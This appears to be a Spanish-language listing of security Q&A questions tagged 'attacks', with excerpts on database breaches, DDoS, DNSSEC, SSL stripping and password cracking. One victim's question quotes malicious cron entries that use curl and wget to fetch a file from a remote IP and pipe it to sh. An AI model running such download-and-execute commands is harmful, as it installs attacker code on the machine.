Preguntas con etiqueta 'attacks'

1
respuesta

Alguien obtuvo acceso a la base de datos MySQL [duplicar]

Alguien me envió un correo electrónico esta mañana informándome que obtuvo acceso a la base de datos MySQL de mis clientes y se ofreció a solucionar el problema a cambio de dinero. He estado haciendo algunas pruebas con un sitio de listado de...
hecha 22.05.2017 - 14:35
1
respuesta

Comportamiento de los sistemas de prevención DDos para redes corporativas [cerrado]

Hice esta pregunta en stackoverflow pero no pude obtener ninguna respuesta e incluso obtuve una votación negativa como regalo para que pruebe mi suerte aquí. Hice una investigación sobre este problema y no pude encontrar nada útil. Piense en una...
hecha 23.05.2017 - 13:40
1
respuesta

Seguridad en el manejo de datos de usuario por mSecure

mSecure es un administrador de contraseñas y la compañía ha lanzado recientemente su última versión (v5) que utiliza sus propios servidores para almacenar y sincronizar los datos del usuario. A algunas personas les preocupa cómo protegen los...
hecha 23.05.2017 - 16:06
1
respuesta

cron activado en la raíz [duplicado]

Los últimos tres meses cada fin de semana aparecen las siguientes instrucciones en la raíz cron 0 * * * * curl http://91.230.47.41/img/logo.jpg|sh 0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh cómo bloquear esta intrusión....
hecha 27.04.2017 - 13:55
1
respuesta

Posibilidad de un ataque DNSSEC

Comienzo a aprender sobre DNS y DNSSEC. Descubrí un trabajo DNSSEC similar a una firma PGP. Un dato firmado por una clave y la clave firmada por otra clave. Por lo tanto, tengo un ataque que podría funcionar con algún supuesto, pero quiero que a...
hecha 01.03.2017 - 02:31
1
respuesta

¿Es posible prevenir el ataque de eliminación de SSL a través de DNSSEC o IPSEC?

Estoy pensando en el ataque de SSL Stripping. Pero, ¿hay alguna forma de prevenir este ataque por DNSSEC o IPSEC?     
hecha 06.03.2017 - 18:34
1
respuesta

¿Qué es la aleatorización ejecutable binaria?

Estoy intentando obtener más información sobre binary executable randomization que se usa para aumentar la incertidumbre del atacante ante la vulnerabilidad del software. He estado buscando en Google pero todavía no pude encontrar una exp...
hecha 17.12.2016 - 23:55
1
respuesta

Producción dividida y espacios web “públicos”

Estamos desarrollando un software, utilizando Git y algún software de organización basado en la web en uno de los miembros del espacio web. Este espacio web está tan aislado, por lo que ninguno podría acceder a él sin saber la dirección. Ahor...
hecha 16.12.2016 - 16:32
2
respuestas

Cómo personalizar una lista de palabras para realizar un ataque de fuerza bruta en leetspeak con hashcat o John el destripador

Estoy intentando desbloquear mi disco duro externo encriptado porque perdí mi papel con la contraseña. Con la ayuda del usuario 3439894, tengo un programa corto para inyectar una lista de palabras y desbloquear el disco duro externo, pero necesi...
hecha 13.11.2016 - 23:53
1
respuesta

¿Cómo saber cuándo se está produciendo un ataque de mascarada?

Tal como lo entiendo, un ataque de enmascaramiento es cuando un atacante actúa como un usuario o entidad registrado / autenticado en un sistema. Obviamente, hay formas de evitar esto, por ejemplo, la educación del usuario, no dejar las contra...
hecha 28.02.2017 - 03:42